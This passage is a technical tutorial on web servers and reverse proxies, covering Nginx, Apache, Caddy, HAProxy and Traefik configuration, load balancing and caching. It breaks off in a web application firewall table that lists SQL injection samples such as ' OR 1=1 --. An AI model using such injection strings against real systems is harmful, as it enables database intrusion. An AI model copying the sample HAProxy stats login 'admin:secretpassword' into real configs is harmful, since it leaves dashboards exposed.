Skip to content

Web Servers and Reverse Proxies

Web servers and reverse proxies are critical infrastructure components that sit between clients and application servers, handling HTTP traffic, SSL/TLS termination, load balancing, static file serving, and more. Understanding how they work is essential for deploying and operating web applications in production.

How Web Traffic Flows in Production

A typical production request flow involves multiple layers, each adding functionality (and latency):

Client (Browser/App)
    │
    ▼
DNS Resolution (Route 53, Cloudflare)
    │  Recursive resolver → Root → TLD → Authoritative
    │  Cached at each layer (TTL-based)
    ▼
CDN (CloudFront, Cloudflare) ──── Cache HIT? → Return cached response
    │ Cache MISS
    ▼
Load Balancer (ALB, Nginx, HAProxy)
    │  Distributes across healthy backends
    │  L4 (TCP) or L7 (HTTP) routing
    ▼
Reverse Proxy / Web Server (Nginx, Caddy)
    │  - SSL/TLS termination
    │  - Static file serving
    │  - Request routing
    │  - Rate limiting
    │  - Compression (gzip/brotli)
    │  - Request/response header manipulation
    ▼
Application Server (Gunicorn, uvicorn, Node.js, Actix)
    │  Business logic execution
    ▼
Backend Services (Database, Cache, Message Queue, External APIs)

DNS Resolution in Detail

When a browser needs to resolve api.example.com:

  1. Browser cache: Checks its own DNS cache (Chrome: chrome://net-internals/#dns)
  2. OS cache: Checks the operating system's DNS resolver cache
  3. Recursive resolver: Sends query to configured DNS server (ISP, 8.8.8.8, 1.1.1.1)
  4. Root nameserver: Directs to the .com TLD nameserver
  5. TLD nameserver: Directs to example.com's authoritative nameserver
  6. Authoritative nameserver: Returns the IP address (or CNAME, then another lookup)

Each answer includes a TTL (Time to Live) that determines how long the result is cached. Short TTLs (60s) enable fast failover but increase DNS query load; long TTLs (3600s) reduce load but delay propagation of changes.

HTTP Protocol Versions

Version Multiplexing Header Compression Transport Key Improvement
HTTP/1.1 No (one request per TCP connection, or pipelining with head-of-line blocking) No TCP Persistent connections, chunked transfer
HTTP/2 Yes (multiple streams over one TCP connection) HPACK TCP Eliminates HOL blocking at HTTP level, server push
HTTP/3 Yes (multiple streams over QUIC) QPACK QUIC (UDP) Eliminates TCP HOL blocking, faster handshakes (0-RTT)

HTTP/2 is the baseline for modern web serving. It reduces latency by multiplexing requests over a single TCP connection, compressing headers, and allowing server push. However, TCP's head-of-line blocking means a single lost packet stalls all streams.

HTTP/3 solves this by using QUIC (built on UDP), where each stream is independent—a lost packet only stalls its own stream. QUIC also combines the TLS and transport handshakes, achieving 0-RTT connection establishment for repeat visitors.

The TLS Handshake

Every HTTPS connection begins with a TLS handshake that establishes encryption:

TLS 1.3 Handshake (1 round trip):

Client                              Server
  │                                    │
  │──── ClientHello ──────────────────▶│  Supported cipher suites, key share
  │                                    │
  │◀─── ServerHello + Certificate ─────│  Chosen cipher, server cert, key share
  │     EncryptedExtensions            │
  │     Finished                       │
  │                                    │
  │──── Finished ─────────────────────▶│  Client confirms
  │                                    │
  │◀═══ Encrypted Application Data ═══▶│  All subsequent data encrypted

TLS 1.3 reduced the handshake from 2 round trips (TLS 1.2) to 1 round trip, and supports 0-RTT (zero round trip time) for repeat connections by caching session parameters. The trade-off with 0-RTT is replay attack vulnerability—it should only be used for idempotent requests (GET).

Nginx

Nginx (pronounced "engine-x") is the most widely used web server and reverse proxy, serving approximately 34% of all websites. It uses an asynchronous, event-driven architecture that handles thousands of concurrent connections efficiently with minimal memory overhead.

Core Architecture

Nginx uses a master-worker process model:

  • Master process: Reads configuration, binds to ports, manages worker processes. Runs as root (needs root for port 80/443) but workers run as unprivileged user (nginx or www-data).
  • Worker processes: Handle actual HTTP requests. Each worker is single-threaded but uses non-blocking I/O (epoll on Linux, kqueue on BSD/macOS) to handle thousands of connections concurrently.
              ┌── Master Process ──┐
              │  Config loading    │
              │  Port binding      │
              │  Worker management │
              └────────┬───────────┘
           ┌───────────┼───────────┐
           ▼           ▼           ▼
      ┌─Worker 1─┐ ┌─Worker 2┐ ┌─Worker N─┐
      │ Event    │ │ Event   │ │ Event    │
      │ Loop     │ │ Loop    │ │ Loop     │
      │ (epoll)  │ │ (epoll) │ │ (epoll)  │
      │          │ │         │ │          │
      │ 1000s of │ │ 1000s   │ │ 1000s of │
      │ connections│ │of conn │ │ connections│
      └──────────┘ └─────────┘ └──────────┘

Why event-driven is efficient: Traditional web servers (Apache prefork) spawn a process per connection—10,000 connections means 10,000 processes, each consuming ~10MB of memory. Nginx handles 10,000 connections in a single worker process using ~25MB total, because it never blocks waiting for I/O. Instead, it registers callbacks with the OS kernel (epoll_wait) and processes events as they become ready.

How epoll works: The Linux kernel's epoll system call efficiently monitors thousands of file descriptors. When a worker calls epoll_wait(), the kernel returns only the file descriptors that have activity (data received, write buffer available). The worker processes these events, initiates non-blocking I/O operations, and loops back to epoll_wait(). This means a single thread can manage thousands of concurrent connections with near-zero idle overhead.

Configuration Deep Dive

Location Matching

Nginx evaluates location blocks in a specific priority order:

# Priority order (highest to lowest):
# 1. Exact match (=)
location = /favicon.ico { }           # Only matches exactly "/favicon.ico"

# 2. Preferential prefix (^~)
location ^~ /static/ { }              # Prefix match, stops regex search

# 3. Regular expression (~ case-sensitive, ~* case-insensitive)
location ~ \.php$ { }                 # Matches *.php (case-sensitive)
location ~* \.(jpg|png|gif)$ { }      # Matches image files (case-insensitive)

# 4. Prefix match (longest wins)
location /api/ { }                     # Matches /api/anything
location /api/v2/ { }                  # Matches /api/v2/anything (longer prefix wins)
location / { }                         # Catch-all (shortest prefix)

The matching algorithm: Nginx first checks all prefix locations and remembers the longest match. Then it checks regex locations in config order—the first regex match wins. If no regex matches, the longest prefix match is used. The = modifier skips all other checks, and ^~ skips regex checking.

Upstream Configuration

upstream app_backend {
    # Load balancing algorithm
    least_conn;                    # Route to server with fewest active connections
    # Other options: round_robin (default), ip_hash, hash, random

    # Backend servers with configuration
    server 127.0.0.1:8001 weight=3;        # Gets 3x traffic
    server 127.0.0.1:8002 weight=1;        # Gets 1x traffic
    server 127.0.0.1:8003 backup;          # Only used if others are down
    server 127.0.0.1:8004 down;            # Marked as permanently unavailable

    # Health checking (passive — based on actual traffic)
    # max_fails: number of failed attempts before marking server as unavailable
    # fail_timeout: time window for max_fails AND how long to mark server as down
    server 127.0.0.1:8005 max_fails=3 fail_timeout=30s;

    # Keep-alive connections to upstream (reduces TCP handshake overhead)
    keepalive 32;                  # Pool of 32 keep-alive connections per worker
    keepalive_timeout 60s;         # Close idle connections after 60 seconds
    keepalive_requests 1000;       # Max requests per keep-alive connection
}

Caching Configuration

# Define a cache zone (in http block)
proxy_cache_path /var/cache/nginx/app
    levels=1:2                    # Two-level directory hashing
    keys_zone=app_cache:10m       # 10MB of shared memory for cache keys (~80,000 keys)
    max_size=1g                   # Maximum disk usage
    inactive=60m                  # Remove cached items not accessed in 60 minutes
    use_temp_path=off;            # Write directly to cache dir (better performance)

server {
    location /api/ {
        proxy_pass http://app_backend;
        proxy_cache app_cache;

        # Cache configuration
        proxy_cache_valid 200 10m;         # Cache 200 responses for 10 minutes
        proxy_cache_valid 404 1m;          # Cache 404 responses for 1 minute
        proxy_cache_valid any 5m;          # Cache everything else for 5 minutes
        proxy_cache_key "$scheme$request_method$host$request_uri";
        proxy_cache_use_stale error timeout updating http_500 http_502 http_503;
        # ↑ Serve stale cached content when backend is erroring or updating

        # Add headers to show cache status
        add_header X-Cache-Status $upstream_cache_status;
        # Values: MISS, HIT, STALE, UPDATING, BYPASS, EXPIRED, REVALIDATED

        # Bypass cache for specific conditions
        proxy_cache_bypass $http_authorization;    # Don't cache authenticated requests
        proxy_no_cache $http_authorization;
    }
}

WebSocket Proxying

WebSocket connections require special proxy configuration because they upgrade from HTTP to a persistent bidirectional protocol:

location /ws/ {
    proxy_pass http://app_backend;
    proxy_http_version 1.1;

    # These headers are required for WebSocket upgrade
    proxy_set_header Upgrade $http_upgrade;
    proxy_set_header Connection "upgrade";

    proxy_set_header Host $host;
    proxy_set_header X-Real-IP $remote_addr;

    # WebSocket connections are long-lived — increase timeouts
    proxy_read_timeout 3600s;      # 1 hour
    proxy_send_timeout 3600s;
}

Performance Tuning

# /etc/nginx/nginx.conf — Performance-optimized configuration

# Worker processes: one per CPU core
worker_processes auto;

# File descriptor limit per worker (must be >= worker_connections * 2)
worker_rlimit_nofile 65535;

events {
    worker_connections 4096;       # Max connections per worker
    use epoll;                     # Linux kernel event notification mechanism
    multi_accept on;               # Accept multiple connections at once
}

http {
    # Sendfile: let the kernel send files directly from disk to socket
    # bypassing user-space (zero-copy). Crucial for static file performance.
    sendfile on;

    # tcp_nopush: send headers and the beginning of a file in one TCP packet
    # Works with sendfile. Reduces number of packets for large file transfers.
    tcp_nopush on;

    # tcp_nodelay: disable Nagle's algorithm — send data immediately
    # without waiting to fill a TCP packet. Reduces latency for small responses.
    tcp_nodelay on;

    # Keep-alive optimization
    keepalive_timeout 65;          # Close idle connections after 65 seconds
    keepalive_requests 10000;      # Max requests per keep-alive connection

    # Buffer optimization
    client_body_buffer_size 16k;   # Buffer for client request bodies
    client_header_buffer_size 1k;  # Buffer for client request headers
    large_client_header_buffers 4 8k;  # For large headers (cookies, auth tokens)
    client_max_body_size 10m;      # Max upload size

    # Proxy buffer optimization
    proxy_buffer_size 4k;          # Buffer for first part of response (headers)
    proxy_buffers 8 16k;           # 8 buffers of 16k for response body
    proxy_busy_buffers_size 32k;   # Max size of buffers being sent to client

    # Compression
    gzip on;
    gzip_vary on;                  # Add Vary: Accept-Encoding header
    gzip_proxied any;              # Compress proxied responses too
    gzip_comp_level 4;             # 1-9 (4 is good balance of CPU vs compression)
    gzip_min_length 1000;          # Don't compress tiny responses
    gzip_types
        text/plain
        text/css
        text/xml
        text/javascript
        application/json
        application/javascript
        application/xml
        application/rss+xml
        image/svg+xml;

    # Logging (optional: disable access log for high-traffic static assets)
    access_log /var/log/nginx/access.log;
    error_log /var/log/nginx/error.log warn;
}

Worker connections calculation: Each proxy connection uses 2 file descriptors (one for client, one for upstream). So worker_connections 4096 supports ~2048 simultaneous proxy connections per worker. With 4 workers, that's ~8192 concurrent connections. Adjust worker_rlimit_nofile to at least worker_connections * 2.

Security Configuration

# Rate limiting: multiple zones for different endpoints
limit_req_zone $binary_remote_addr zone=general:10m rate=30r/s;
limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;

# Connection limiting
limit_conn_zone $binary_remote_addr zone=addr:10m;

server {
    listen 443 ssl http2;
    server_name example.com;

    # SSL/TLS Configuration (modern)
    ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
    ssl_protocols TLSv1.2 TLSv1.3;
    ssl_ciphers 'ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384';
    ssl_prefer_server_ciphers off;     # Let client choose (TLS 1.3 ignores this)

    # OCSP Stapling: server fetches certificate revocation status and sends it
    # to clients, avoiding the client needing to contact the CA
    ssl_stapling on;
    ssl_stapling_verify on;
    ssl_trusted_certificate /etc/letsencrypt/live/example.com/chain.pem;
    resolver 8.8.8.8 8.8.4.4 valid=300s;

    # Session caching: avoid repeating full TLS handshake for returning clients
    ssl_session_cache shared:SSL:10m;
    ssl_session_timeout 1d;
    ssl_session_tickets off;       # Disable for forward secrecy

    # Security Headers
    add_header X-Frame-Options "SAMEORIGIN" always;
    add_header X-Content-Type-Options "nosniff" always;
    add_header X-XSS-Protection "1; mode=block" always;
    add_header Referrer-Policy "strict-origin-when-cross-origin" always;
    add_header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" always;
    add_header Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'" always;
    add_header Permissions-Policy "camera=(), microphone=(), geolocation=()" always;

    # Hide Nginx version
    server_tokens off;

    # Request size limit (prevent upload abuse)
    client_max_body_size 10m;

    # Rate limiting applied per location
    location /api/auth/ {
        limit_req zone=auth burst=3 nodelay;
        limit_conn addr 5;
        proxy_pass http://app_backend;
    }

    location /api/ {
        limit_req zone=api burst=20 nodelay;
        # burst=20: allow bursts of 20 requests beyond the rate
        # nodelay: process burst requests immediately (don't queue them)
        proxy_pass http://app_backend;
    }
}

Rate limiting explained: rate=100r/s creates a token bucket that fills at 100 tokens per second. Each request consumes one token. burst=20 adds a buffer of 20 tokens. Without nodelay, excess requests within the burst are delayed (queued); with nodelay, they're processed immediately but the burst bucket still drains at the configured rate.

Production Configuration Example

# /etc/nginx/nginx.conf — Complete production configuration

user nginx;
worker_processes auto;
pid /run/nginx.pid;
worker_rlimit_nofile 65535;
error_log /var/log/nginx/error.log warn;

events {
    worker_connections 4096;
    use epoll;
    multi_accept on;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    # Logging format with timing info
    log_format main '$remote_addr - $remote_user [$time_local] '
                    '"$request" $status $body_bytes_sent '
                    '"$http_referer" "$http_user_agent" '
                    'rt=$request_time uct=$upstream_connect_time '
                    'uht=$upstream_header_time urt=$upstream_response_time';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    tcp_nopush on;
    tcp_nodelay on;
    keepalive_timeout 65;
    keepalive_requests 10000;

    gzip on;
    gzip_vary on;
    gzip_proxied any;
    gzip_comp_level 4;
    gzip_min_length 1000;
    gzip_types text/plain text/css text/xml text/javascript
               application/json application/javascript application/xml
               image/svg+xml;

    # Rate limiting zones
    limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
    limit_req_zone $binary_remote_addr zone=api:10m rate=100r/s;

    # Upstream backends
    upstream app_backend {
        least_conn;
        server 127.0.0.1:8001 max_fails=3 fail_timeout=30s;
        server 127.0.0.1:8002 max_fails=3 fail_timeout=30s;
        server 127.0.0.1:8003 max_fails=3 fail_timeout=30s;
        keepalive 64;
    }

    # HTTP → HTTPS redirect
    server {
        listen 80;
        server_name example.com www.example.com;
        return 301 https://example.com$request_uri;
    }

    # www → non-www redirect
    server {
        listen 443 ssl http2;
        server_name www.example.com;
        ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
        return 301 https://example.com$request_uri;
    }

    # Main server block
    server {
        listen 443 ssl http2;
        server_name example.com;

        ssl_certificate /etc/letsencrypt/live/example.com/fullchain.pem;
        ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
        ssl_protocols TLSv1.2 TLSv1.3;
        ssl_session_cache shared:SSL:10m;
        ssl_session_timeout 1d;
        ssl_stapling on;
        ssl_stapling_verify on;

        add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
        add_header X-Frame-Options "SAMEORIGIN" always;
        add_header X-Content-Type-Options "nosniff" always;
        server_tokens off;

        # Static files
        location /static/ {
            alias /var/www/app/static/;
            expires 365d;
            add_header Cache-Control "public, immutable";
            access_log off;
        }

        # Health check endpoint (for load balancer)
        location = /health {
            access_log off;
            return 200 "healthy\n";
            add_header Content-Type text/plain;
        }

        # Auth endpoints (strict rate limiting)
        location /api/auth/ {
            limit_req zone=auth burst=3 nodelay;
            proxy_pass http://app_backend;
            include /etc/nginx/proxy_params;
        }

        # API endpoints
        location /api/ {
            limit_req zone=api burst=20 nodelay;
            proxy_pass http://app_backend;
            include /etc/nginx/proxy_params;
        }

        # WebSocket
        location /ws/ {
            proxy_pass http://app_backend;
            proxy_http_version 1.1;
            proxy_set_header Upgrade $http_upgrade;
            proxy_set_header Connection "upgrade";
            proxy_read_timeout 3600s;
            include /etc/nginx/proxy_params;
        }

        # Frontend (SPA)
        location / {
            root /var/www/app/dist;
            try_files $uri $uri/ /index.html;
        }
    }
}

Apache HTTP Server

Apache is one of the oldest and most configurable web servers (since 1995). Unlike Nginx's event-driven model, Apache traditionally uses a process-per-connection (prefork) or thread-per-connection (worker) model, though the modern event MPM is event-driven.

Multi-Processing Modules (MPMs)

MPM Model Connections Memory Use Case
prefork One process per connection Low (hundreds) High (~10MB/process) PHP mod_php (not thread-safe), maximum stability
worker Thread pool per process Medium (thousands) Medium (~1MB/thread) Thread-safe applications, moderate traffic
event Event-driven + thread pool High (thousands) Lower Modern default, similar to Nginx for keep-alive

The event MPM is Apache's answer to Nginx's efficiency. It uses dedicated threads to handle keep-alive connections, freeing worker threads to process requests. For keep-alive-heavy workloads, event MPM dramatically reduces resource usage compared to prefork.

Apache vs. Nginx

Feature Nginx Apache
Architecture Event-driven, async Process/thread per connection (or event MPM)
Performance Excellent for static content, reverse proxy Good, but higher memory per connection
Configuration Centralized files, requires reload .htaccess for per-directory overrides (no reload)
Module loading Compiled-in or dynamic (limited) Highly modular, dynamic loading at runtime
URL rewriting rewrite directive (simpler) mod_rewrite (powerful but complex regex engine)
Use case Reverse proxy, load balancer, static files Dynamic content (mod_php), .htaccess flexibility
Market share ~34% ~29% (declining)

When to use Apache: Apache's .htaccess files allow per-directory configuration without reloading the server—useful for shared hosting where users need to configure their own URL rewrites, authentication, and caching rules. However, .htaccess has a performance cost: Apache checks for .htaccess files in every directory in the path for every request.

mod_rewrite

Apache's mod_rewrite is a powerful URL rewriting engine used for redirects, pretty URLs, and complex routing:

# .htaccess — Common mod_rewrite patterns

RewriteEngine On

# Force HTTPS
RewriteCond %{HTTPS} off
RewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]

# Remove trailing slash
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)/$ /$1 [L,R=301]

# SPA fallback (route all non-file requests to index.html)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.html [L]

# Proxy API requests to backend
RewriteRule ^api/(.*)$ http://localhost:8080/api/$1 [P,L]

Caddy

Caddy is a modern web server written in Go, notable for automatic HTTPS (obtains and renews Let's Encrypt certificates automatically with zero configuration).

Automatic HTTPS Internals

Caddy implements the ACME (Automatic Certificate Management Environment) protocol to obtain certificates from Let's Encrypt:

  1. Challenge: Caddy proves domain ownership using one of:
  2. HTTP-01: Place a token at http://domain/.well-known/acme-challenge/TOKEN (requires port 80)
  3. TLS-ALPN-01: Present a self-signed certificate with a specific ALPN extension during TLS handshake (requires port 443)
  4. DNS-01: Create a DNS TXT record _acme-challenge.domain (works behind firewalls, supports wildcards)
  5. Issuance: Once verified, Let's Encrypt issues the certificate (valid for 90 days)
  6. Renewal: Caddy automatically renews certificates ~30 days before expiration
  7. OCSP stapling: Caddy automatically staples OCSP responses

Caddyfile Configuration

# Caddyfile — Caddy's configuration format
example.com {
    # Automatic HTTPS — no SSL config needed!

    # Reverse proxy to application
    reverse_proxy /api/* localhost:8080 {
        # Load balancing
        lb_policy least_conn

        # Health checking
        health_uri /health
        health_interval 10s
        health_timeout 5s

        # Headers
        header_up X-Real-IP {remote_host}
        header_up X-Forwarded-Proto {scheme}

        # Transport configuration
        transport http {
            keepalive 30s
            keepalive_idle_conns 64
        }
    }

    # Static file serving
    root * /var/www/site
    file_server {
        hide .git .env
    }

    # Compression
    encode gzip zstd

    # Security headers
    header {
        X-Frame-Options "SAMEORIGIN"
        X-Content-Type-Options "nosniff"
        Strict-Transport-Security "max-age=31536000"
        -Server                         # Remove Server header
    }

    # Rate limiting (with caddy-ratelimit plugin)
    rate_limit {remote.host} 100r/m

    # Logging
    log {
        output file /var/log/caddy/access.log {
            roll_size 100mb
            roll_keep 5
        }
        format json
    }
}

Caddy vs. Nginx: Caddy's primary advantages are automatic HTTPS, simpler configuration syntax, and a single binary with no dependencies. Nginx has a larger ecosystem, more community resources, and marginally better raw performance for extremely high-throughput scenarios. For most applications, the difference is negligible, and Caddy's simplicity reduces operational risk.

HAProxy

HAProxy (High Availability Proxy) is a dedicated, high-performance load balancer and proxy. While Nginx handles both web serving and proxying, HAProxy is purpose-built for proxying and load balancing, and excels at very high connection rates (millions of concurrent connections).

Architecture

HAProxy uses a single-process, event-driven model (similar to Nginx workers). It's designed for maximum throughput and minimum latency in the proxy path.

Configuration

# /etc/haproxy/haproxy.cfg

global
    log /dev/log local0
    maxconn 50000
    user haproxy
    group haproxy
    daemon

    # SSL tuning
    ssl-default-bind-options ssl-min-ver TLSv1.2
    ssl-default-bind-ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256
    tune.ssl.default-dh-param 2048

defaults
    log     global
    mode    http                    # Layer 7 mode (use 'tcp' for Layer 4)
    option  httplog                 # Detailed HTTP logging
    option  dontlognull             # Don't log health check connections
    option  forwardfor              # Add X-Forwarded-For header
    timeout connect 5s
    timeout client  30s
    timeout server  30s
    timeout http-keep-alive 10s
    timeout http-request 10s        # Max time for client to send full request

    # Retry on connection failure
    retries 3
    option redispatch               # Retry on a different server if one fails

# Stats dashboard (accessible at :8404/stats)
frontend stats
    bind *:8404
    stats enable
    stats uri /stats
    stats refresh 10s
    stats auth admin:secretpassword

# Frontend: incoming traffic
frontend http_front
    bind *:80
    bind *:443 ssl crt /etc/ssl/certs/example.pem
    redirect scheme https if !{ ssl_fc }

    # Route based on host header
    acl is_api hdr(host) -i api.example.com
    acl is_web hdr(host) -i www.example.com

    use_backend api_servers if is_api
    default_backend web_servers

# Backend: API servers
backend api_servers
    balance leastconn
    option httpchk GET /health      # Active health checking

    # Health check configuration
    default-server inter 5s fall 3 rise 2
    # inter: check every 5s | fall: 3 failures = down | rise: 2 successes = up

    server api1 10.0.1.10:8080 check weight 100
    server api2 10.0.1.11:8080 check weight 100
    server api3 10.0.1.12:8080 check weight 50    # Smaller instance, less traffic

    # Connection draining: when a server is marked "drain",
    # existing connections finish but no new ones are routed
    # Useful during deployments: mark server drain → wait → deploy → mark ready

# Backend: Web servers
backend web_servers
    balance roundrobin
    option httpchk GET /health
    cookie SRVID insert indirect nocache  # Session persistence via cookie

    server web1 10.0.2.10:3000 check cookie web1
    server web2 10.0.2.11:3000 check cookie web2

HAProxy Stick Tables

Stick tables track connection information for rate limiting, session persistence, and abuse detection:

# Rate limiting with stick tables
frontend http_front
    bind *:443 ssl crt /etc/ssl/certs/example.pem

    # Track request rates per IP
    stick-table type ip size 100k expire 30s store http_req_rate(10s)
    http-request track-sc0 src
    http-request deny deny_status 429 if { sc_http_req_rate(0) gt 100 }
    # ↑ Deny with 429 if more than 100 requests in 10 seconds from same IP

Traefik

Traefik is a modern reverse proxy designed for microservices and container environments. Its killer feature is automatic service discovery: it watches Docker, Kubernetes, and other orchestrators and automatically configures routing to new services.

Docker Integration

# docker-compose.yml with Traefik
version: '3'

services:
  traefik:
    image: traefik:v3.0
    command:
      - --api.dashboard=true
      - --providers.docker=true
      - --providers.docker.exposedByDefault=false
      - --entrypoints.web.address=:80
      - --entrypoints.websecure.address=:443
      - --certificatesresolvers.letsencrypt.acme.email=admin@example.com
      - --certificatesresolvers.letsencrypt.acme.storage=/letsencrypt/acme.json
      - --certificatesresolvers.letsencrypt.acme.httpchallenge.entrypoint=web
    ports:
      - "80:80"
      - "443:443"
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock:ro
      - letsencrypt:/letsencrypt

  api:
    image: myapp/api:latest
    labels:
      # Traefik discovers this service via Docker labels
      - traefik.enable=true
      - traefik.http.routers.api.rule=Host(`api.example.com`)
      - traefik.http.routers.api.tls.certresolver=letsencrypt
      - traefik.http.services.api.loadbalancer.server.port=8080

      # Middleware: rate limiting
      - traefik.http.middlewares.api-ratelimit.ratelimit.average=100
      - traefik.http.middlewares.api-ratelimit.ratelimit.burst=50
      - traefik.http.routers.api.middlewares=api-ratelimit

  frontend:
    image: myapp/frontend:latest
    labels:
      - traefik.enable=true
      - traefik.http.routers.frontend.rule=Host(`www.example.com`)
      - traefik.http.routers.frontend.tls.certresolver=letsencrypt

volumes:
  letsencrypt:

Traefik vs. Nginx as Kubernetes Ingress: Traefik natively integrates with Kubernetes IngressRoute CRDs and automatically discovers services. Nginx Ingress Controller requires ConfigMaps or annotations and has a more traditional configuration model. Traefik is often preferred for dynamic environments; Nginx Ingress for environments where the configuration is more static and the Nginx ecosystem (ModSecurity, etc.) is needed.

Load Balancing Deep Dive

Algorithms

Algorithm Description Best For
Round Robin Distributes requests sequentially across servers Equal-capacity servers, stateless requests
Weighted Round Robin Like round robin, but servers with higher weights get more traffic Mixed server sizes (e.g., c5.xlarge + c5.2xlarge)
Least Connections Routes to the server with fewest active connections Requests with variable processing times
IP Hash Hash of client IP determines server (consistent mapping) Session persistence without cookies
Consistent Hashing Hash ring that minimizes redistribution when servers are added/removed Caching proxies (only 1/N keys move when adding a server)
Random Two Choices Pick 2 random servers, route to the one with fewer connections Large server pools (simple, surprisingly effective)

Consistent hashing is worth understanding deeply. Traditional hash-based routing (e.g., server = hash(client_ip) % N) breaks when N changes—adding or removing a server remaps almost all clients. Consistent hashing places servers on a virtual ring (hash values 0 to 2^32). Each request is hashed and routed to the next server clockwise on the ring. When a server is added, only its neighbors' traffic is affected (~1/N keys move instead of all).

Consistent Hash Ring:

        Server A (hash: 100)
           /
    ──────●─────────────────●── Server B (hash: 300)
    │                       │
    │    Hash Ring          │
    │    (0 to 2^32)        │
    │                       │
    ──────●─────────────────●── Server D (hash: 700)
           \
        Server C (hash: 500)

Request with hash 250 → routes to Server B (next clockwise)
Request with hash 450 → routes to Server C
Adding Server E (hash: 400) → only requests 301-400 move from C to E

Layer 4 vs. Layer 7 Load Balancing

Feature Layer 4 (TCP/UDP) Layer 7 (HTTP/HTTPS)
Routing basis IP address, port URL path, host header, cookies, HTTP headers
Performance Higher throughput, lower latency Slightly lower throughput (must parse HTTP)
SSL termination Passthrough or termination Termination (can inspect HTTP after decryption)
Features Basic health checks, connection limiting Content-based routing, header manipulation, WAF
Use cases Database load balancing, raw TCP services, ultra-high throughput HTTP APIs, web applications, microservice routing
AWS service NLB (Network Load Balancer) ALB (Application Load Balancer)

When to use L4: When you need the absolute highest performance (millions of requests/sec), when the backend protocol isn't HTTP (databases, custom TCP protocols), or when you want SSL passthrough (backend handles its own TLS).

When to use L7: When you need content-based routing (route /api/v1/users to user-service, /api/v1/orders to order-service), when you need to inspect or modify HTTP headers, or when you want advanced features like sticky sessions with cookies.

Health Checking

Type Mechanism Pros Cons
Active Load balancer periodically sends health check requests to backends Detects failures before user traffic is affected Adds load to backends, may trigger rate limits
Passive Monitor actual traffic responses for errors No additional load, reflects real user experience Requires traffic to detect failures (cold start problem)
Combined Active checks supplement passive monitoring Best of both worlds More complex configuration
# Nginx active health checking (requires nginx-plus or third-party module)
upstream backend {
    zone backend 64k;
    server 10.0.1.1:8080;
    server 10.0.1.2:8080;

    # Check /health every 5 seconds, consider healthy after 2 passes,
    # unhealthy after 3 failures
    health_check interval=5s fails=3 passes=2 uri=/health;
}

Connection Draining

During deployments, you need to gracefully remove servers from the load balancer pool without dropping active connections:

  1. Mark server as draining: Stop routing new connections to it
  2. Wait for active connections to complete: Set a drain timeout (e.g., 30 seconds)
  3. Deploy: Update the application on the drained server
  4. Re-add server: Mark it as healthy and start routing traffic again

This is handled automatically by Kubernetes during rolling updates (via terminationGracePeriodSeconds and preStop hooks) and by cloud load balancers (deregistration delay on target groups).

Caching at the Proxy Layer

Cache-Control Headers

HTTP caching is governed by the Cache-Control header. Understanding these directives is essential:

Directive Description
public Response can be cached by any cache (CDN, proxy, browser)
private Response can only be cached by the browser (not CDN/proxy)
no-cache Cache can store the response BUT must revalidate with origin before serving (misleading name!)
no-store Response must never be cached anywhere
max-age=N Response is fresh for N seconds
s-maxage=N Like max-age but only for shared caches (CDN/proxy) — overrides max-age for shared caches
stale-while-revalidate=N Serve stale content for N seconds while fetching fresh content in background
stale-if-error=N Serve stale content for N seconds if origin returns an error
immutable Content will never change — browser should never revalidate (use with cache-busted URLs)

Practical caching strategy:

Static assets (hashed filenames: app.a1b2c3.js):
  Cache-Control: public, max-age=31536000, immutable

API responses (user-specific):
  Cache-Control: private, no-cache

API responses (public, changes slowly):
  Cache-Control: public, max-age=300, stale-while-revalidate=60

HTML pages:
  Cache-Control: no-cache
  (Always revalidate, but can use 304 Not Modified with ETag)

Authenticated API responses:
  Cache-Control: private, no-store

Microcaching

Even caching dynamic content for 1 second can dramatically reduce backend load under high traffic. If 10,000 requests hit the same endpoint within 1 second, only 1 reaches the backend:

proxy_cache_path /var/cache/nginx/micro
    levels=1:2 keys_zone=micro:1m max_size=100m;

location /api/popular-endpoint {
    proxy_pass http://app_backend;
    proxy_cache micro;
    proxy_cache_valid 200 1s;          # Cache successful responses for just 1 second
    proxy_cache_lock on;               # Only one request fetches from backend;
                                       # others wait for the cached result
    proxy_cache_use_stale updating;    # Serve stale while refreshing
}

Reverse Proxy vs. Forward Proxy

Feature Reverse Proxy Forward Proxy
Position In front of servers In front of clients
Purpose Protect/optimize backend servers Protect/anonymize clients
Use cases Load balancing, SSL termination, caching, security, compression Corporate firewalls, anonymity, content filtering, compliance
Client awareness Client doesn't know about backend servers Server doesn't know about actual clients
Configuration Server-side (server admin configures) Client-side (client configures proxy settings)
Examples Nginx, Caddy, HAProxy, Traefik Squid, corporate proxies, VPNs, SOCKS proxies

Reverse proxy use cases in detail: - SSL/TLS termination: Decrypt HTTPS at the proxy so backend servers handle plain HTTP (simpler, faster backend processing) - Static file serving: Serve CSS/JS/images directly from disk without hitting the application server - Compression: gzip/brotli compress responses, reducing bandwidth usage by 60-80% - Request buffering: Buffer slow client uploads and send to backend all at once, freeing the backend connection - Security: Hide backend topology, rate limit abusive clients, filter malicious requests - A/B testing: Route percentage of traffic to different backend versions

Web Application Firewall (WAF)

A WAF inspects HTTP/HTTPS traffic and blocks malicious requests before they reach your application. It operates at Layer 7, understanding HTTP semantics.

What a WAF Protects Against

Attack Category Examples WAF Rule
SQL Injection ' OR 1=1 --, UNION SELECT Detect SQL keywords in query params/body
